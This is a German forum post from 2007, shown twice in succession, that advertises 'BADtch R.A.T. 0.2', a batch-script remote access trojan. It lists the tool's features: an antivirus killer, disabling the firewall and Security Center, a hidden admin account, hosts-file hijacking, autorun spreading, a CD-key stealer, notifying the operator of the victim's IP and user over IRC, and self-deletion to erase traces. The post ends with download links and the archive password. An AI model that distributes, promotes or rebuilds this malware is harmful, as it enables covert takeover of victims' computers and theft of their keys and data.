Fugitif
08.10.2007, 15:31
Remote Admin Tool (RAT)
http://www.megasecurity.org/trojans/b/badtch/ImagesP/Badtch0.2.gif
## About ################################################## ###################
# #
# Name : [BADtch R.A.T.] 0.2 #
# Type : Remote Admin Tool (RAT) #
# Lizenz : Freeware #
# Coder : Mr Hawk #
# Company : [BAD R.A.T.]-Company #
# URL : www.bad-rat.de.vu #
# Blog : badrat.blog.de #
# Email : thebadrat@gmx.de #
# #
################################################## ############################
## Achtung: ################################################## ################
# #
# Autor kann nicht für eventuelle Schäden zur Verantwortung gezogen werden! #
# Jeder ist für sein Handeln selbst verwantwortlich! #
# #
################################################## ############################
Alle Script ist Freeware und darf deswegen nicht für komerzielle Zwecke
verwendet werden!
= Bug fixed
[#] = neu hinzugefügt
ToDo (folgendes ist geplant)
Funktionen:
Icq-Manipulation
RemoteIP ermitteln-->IP bannen (beim Script)
Mod und Gast Konto für das Script
C2C-Chat
Vic2C-Chat
Multi-Userfähig
TCP-Tunnle
Reserved-Connection
Filemanger
Datei suchen
Rundll32 mciExecute und SendMessageA (Webcam,Mirco,etc)
Zusatz-Scripte:
Anonym-Mailer
Polymorphe Verschlüsslung
IRC-Client
Port/Hostscanner
Wer mir bei den Funktionen helfen möchte kann sich gerne bei mir melden.
Version 0.2
Dos-CMD von 1 auf 8 Parameter erhöht
Fav-Auslesen auch bei Pfaden mit Leerzeichen
Prüft, ob der Telnet-Server überhaupt da ist
Hosthijack-Dateipfad gefixt
Das Menü neu geordnet und in Sektionen unterteilt
Großen Call-Syntaxfehler ausgemerzt (V 0.1 funktioniert deswegen nicht)
Ü/Ä/Ö durch UE/AE/OE ersetzt (Dos interpretiert diese Buchstaben falsch)
Script-Notify verbessert
[#] Login_cmd-Inject
[#] Passwortabfrage für Script
[#] Vic-IP auslesen
[#] SIN IP/Datum/Zeit/OS/Benutzername/Userdomain
[#] IRC-Notify (experimentell)
[#] 3 weiter RegStartups
[#] lasttools Listet alle letzten Programme auf
[#] starturl (url) Oeffnet eine URL
[#] makefav (favname)(favurl) erstellt Favorit
[#] playme (file) Spielt alles ab (aif,auf,avi,midi,mov,mpeg,sound)
[#] stopme (file) Stopt Sound
[#] 3dtext ("text")[para_num] 3D-Text-Scr als Standart [1=startet Scr]
[#] marquee("text")[para_num] Marquee-Scr als Standart [1=startet Scr]
[#] wall ("Pfad") [para_num] Setzt neues Wallpaper [0=zentriert;1=nebeneinander;2=gestreckt]
[#] listuin Listet ICQ-UIN auf
[#] readuin ICQ-UIN lesen
[#] msgbox "msg" Nachrichtfenster
[#] beep {delay} Beep {Delay}
Serversetup
[#] Es gibt erstmal ein Serversetup :o)
[#] Autorun.inf wird erstellt
Plugins
[#] View_Dialogs_Plugin öffnet 47 verschieden Dialog-Fenster
Printer_Plugin: HTML-Seite drucken
[#] plugin_cdkeystealer
[#] plugin_dialogs
[#] plugin_kb_code
[#] plugin_syscolor
[#] plugin_roh
[#] plugin_printer
Version 0.1 (untested version)
- Port,USername,Passwort selber wählen
- Startup (Reg und als Service)
- Script-Notify
- Melt Server
- WinXP-FW und Sec-Center ausschalten
- AV-Killer
- AV-Regdisable
- Hosthijack beim Installieren
- Sprache (Deutsch,English)
- Remote-Desktop freigabe
- User Konto mit Adminrechten wird erstellt und versteckt
Befehl Beschreibung
ddl "(URL)" "(File)" Direktdownload
"(URL)" = Quelle im Netz
"(File)" = Ziel auf HD
myftp Download per FTP
fileprop (Datei) Dateieigenschaften
inet (num) Internet
1 =Connect
2 =Disconnect
userinfo User-Informationen
1=Allgemein
2=Installierte Software
3=Mediaplayerlist
4=Letzte CMDs
intscr (Scr-Pfad) Screensaver installieren
intinf (INF) (Section) Inf-Datei installieren
dklink (Verzeichnis) Desktop-Verknuepfung
shutdown (num) Windows
1 = Herunterfahren
2 = Reboot
3 = Abmelden
ieset (num) [hjip hjhost] IE Einstellungen
1 = Zeigt Infos
2 = Letzten 20 URLs
3 = alle Fav auflisten
4 = Hosthijack [hjip hjhost]
disreg (num) Regedit 1=aktivieren;0=deaktivieren
distask (num) Taskmanager 1=aktivieren;0=deaktivieren
a2g Admin wird eingeschraenkt
shutall schlieszt alle Programme
dos (command) Dos-Befehle (CMD)
mouse (num) [para_num] Maus_Funktionen
1 = Ausschalten [1=aktivieren;0=deaktivieren]
2 = Button austauschen
3 = setzt Curser nach Links oben
4 = DoubleClickSpeed [para_num] (z.B. 500)
5 = MouseSensitivity [para_num] (z.B. 10)
6 = MouseSpeed [para_num] (z.B. 1)
7 = Button austauschen (bei Neustart)
diskey (num) Tastatur 1=aktiviert;0=deaktiviert
plug (plugin) startet Plugin-Script
selfkill (y) Loescht sich selber und verwischt alle Spuren,
Homepage:
http://omega2.om.funpic.de/batch/
Download:
http://omega2.om.funpic.de/batch/public02.zip
Passwort = mrhawk
http://www.megasecurity.org/trojans/b/badtch/ImagesP/Badtch0.2.gif
## About ################################################## ###################
# #
# Name : [BADtch R.A.T.] 0.2 #
# Type : Remote Admin Tool (RAT) #
# Lizenz : Freeware #
# Coder : Mr Hawk #
# Company : [BAD R.A.T.]-Company #
# URL : www.bad-rat.de.vu #
# Blog : badrat.blog.de #
# Email : thebadrat@gmx.de #
# #
################################################## ############################
## Achtung: ################################################## ################
# #
# Autor kann nicht für eventuelle Schäden zur Verantwortung gezogen werden! #
# Jeder ist für sein Handeln selbst verwantwortlich! #
# #
################################################## ############################
Alle Script ist Freeware und darf deswegen nicht für komerzielle Zwecke
verwendet werden!
= Bug fixed
[#] = neu hinzugefügt
ToDo (folgendes ist geplant)
Funktionen:
Icq-Manipulation
RemoteIP ermitteln-->IP bannen (beim Script)
Mod und Gast Konto für das Script
C2C-Chat
Vic2C-Chat
Multi-Userfähig
TCP-Tunnle
Reserved-Connection
Filemanger
Datei suchen
Rundll32 mciExecute und SendMessageA (Webcam,Mirco,etc)
Zusatz-Scripte:
Anonym-Mailer
Polymorphe Verschlüsslung
IRC-Client
Port/Hostscanner
Wer mir bei den Funktionen helfen möchte kann sich gerne bei mir melden.
Version 0.2
Dos-CMD von 1 auf 8 Parameter erhöht
Fav-Auslesen auch bei Pfaden mit Leerzeichen
Prüft, ob der Telnet-Server überhaupt da ist
Hosthijack-Dateipfad gefixt
Das Menü neu geordnet und in Sektionen unterteilt
Großen Call-Syntaxfehler ausgemerzt (V 0.1 funktioniert deswegen nicht)
Ü/Ä/Ö durch UE/AE/OE ersetzt (Dos interpretiert diese Buchstaben falsch)
Script-Notify verbessert
[#] Login_cmd-Inject
[#] Passwortabfrage für Script
[#] Vic-IP auslesen
[#] SIN IP/Datum/Zeit/OS/Benutzername/Userdomain
[#] IRC-Notify (experimentell)
[#] 3 weiter RegStartups
[#] lasttools Listet alle letzten Programme auf
[#] starturl (url) Oeffnet eine URL
[#] makefav (favname)(favurl) erstellt Favorit
[#] playme (file) Spielt alles ab (aif,auf,avi,midi,mov,mpeg,sound)
[#] stopme (file) Stopt Sound
[#] 3dtext ("text")[para_num] 3D-Text-Scr als Standart [1=startet Scr]
[#] marquee("text")[para_num] Marquee-Scr als Standart [1=startet Scr]
[#] wall ("Pfad") [para_num] Setzt neues Wallpaper [0=zentriert;1=nebeneinander;2=gestreckt]
[#] listuin Listet ICQ-UIN auf
[#] readuin ICQ-UIN lesen
[#] msgbox "msg" Nachrichtfenster
[#] beep {delay} Beep {Delay}
Serversetup
[#] Es gibt erstmal ein Serversetup :o)
[#] Autorun.inf wird erstellt
Plugins
[#] View_Dialogs_Plugin öffnet 47 verschieden Dialog-Fenster
Printer_Plugin: HTML-Seite drucken
[#] plugin_cdkeystealer
[#] plugin_dialogs
[#] plugin_kb_code
[#] plugin_syscolor
[#] plugin_roh
[#] plugin_printer
Version 0.1 (untested version)
- Port,USername,Passwort selber wählen
- Startup (Reg und als Service)
- Script-Notify
- Melt Server
- WinXP-FW und Sec-Center ausschalten
- AV-Killer
- AV-Regdisable
- Hosthijack beim Installieren
- Sprache (Deutsch,English)
- Remote-Desktop freigabe
- User Konto mit Adminrechten wird erstellt und versteckt
Befehl Beschreibung
ddl "(URL)" "(File)" Direktdownload
"(URL)" = Quelle im Netz
"(File)" = Ziel auf HD
myftp Download per FTP
fileprop (Datei) Dateieigenschaften
inet (num) Internet
1 =Connect
2 =Disconnect
userinfo User-Informationen
1=Allgemein
2=Installierte Software
3=Mediaplayerlist
4=Letzte CMDs
intscr (Scr-Pfad) Screensaver installieren
intinf (INF) (Section) Inf-Datei installieren
dklink (Verzeichnis) Desktop-Verknuepfung
shutdown (num) Windows
1 = Herunterfahren
2 = Reboot
3 = Abmelden
ieset (num) [hjip hjhost] IE Einstellungen
1 = Zeigt Infos
2 = Letzten 20 URLs
3 = alle Fav auflisten
4 = Hosthijack [hjip hjhost]
disreg (num) Regedit 1=aktivieren;0=deaktivieren
distask (num) Taskmanager 1=aktivieren;0=deaktivieren
a2g Admin wird eingeschraenkt
shutall schlieszt alle Programme
dos (command) Dos-Befehle (CMD)
mouse (num) [para_num] Maus_Funktionen
1 = Ausschalten [1=aktivieren;0=deaktivieren]
2 = Button austauschen
3 = setzt Curser nach Links oben
4 = DoubleClickSpeed [para_num] (z.B. 500)
5 = MouseSensitivity [para_num] (z.B. 10)
6 = MouseSpeed [para_num] (z.B. 1)
7 = Button austauschen (bei Neustart)
diskey (num) Tastatur 1=aktiviert;0=deaktiviert
plug (plugin) startet Plugin-Script
selfkill (y) Loescht sich selber und verwischt alle Spuren,
Homepage:
http://omega2.om.funpic.de/batch/
Download:
http://omega2.om.funpic.de/batch/public02.zip
Passwort = mrhawk